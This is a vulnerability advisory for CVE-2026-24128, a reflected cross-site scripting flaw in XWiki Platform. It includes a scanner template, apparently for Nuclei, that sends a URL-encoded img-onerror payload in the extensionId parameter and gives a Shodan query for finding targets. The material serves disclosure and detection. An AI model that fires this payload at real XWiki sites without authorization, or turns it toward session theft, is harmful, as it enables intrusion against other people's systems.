CVE-2026-24128: XWiki Platform Distribution Flavor Main - Cross-Site Scripting

日期: 2026-02-03 | 影响软件: 未知 | POC: 已公开

漏洞描述

XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.

PoC代码[已公开]

id: CVE-2026-24128

info:
  name: XWiki Platform Distribution Flavor Main - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki Platform Distribution Flavor Main versions prior to 17.6.0 are vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied input in the extensionId parameter. An attacker can exploit this issue by injecting malicious JavaScript, which will be executed in the context of the victim's browser, potentially leading to session hijacking or other attacks.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-23462
    - https://nvd.nist.gov/vuln/detail/CVE-2026-24128
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-24128
    epss-score: 0.0002
    epss-percentile: 0.04545
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    vendor: XWiki
    product: xwiki-platform-distribution-flavor-main
    shodan-query: html:"data-xwiki-reference"
  tags: cve,cve2026,xwiki,xss

http:
  - raw:
      - |
        GET /xwiki/bin/view/XWiki/Main?xpage=distribution&extensionSection=progress&extensionId=org.xwiki.platform%3Axwiki-platform-distribution-flavor-mainwikia7jdh%3Cimg%20src%3Da%20onerror%3Dalert(document.domain)%3Eh5kturc1hk&extensionVersion=17.6.0&extensionNamespace=wiki%3Axwiki&extensionAction=install HTTP/1.1
        Host: {{Hostname}}

    redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src=a onerror=alert(document.domain)>"
          - "xwiki.extension.job"
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502205db0b5491c2fb10e3ac074e63070f063b076384f14cb9c562459b103634f252802210087c0508287b7a36c0a3cc5e8bc56753c6081f8b2cecab1b640a150df90bdf0ce:922c64590222798bb761d5b6d8e72950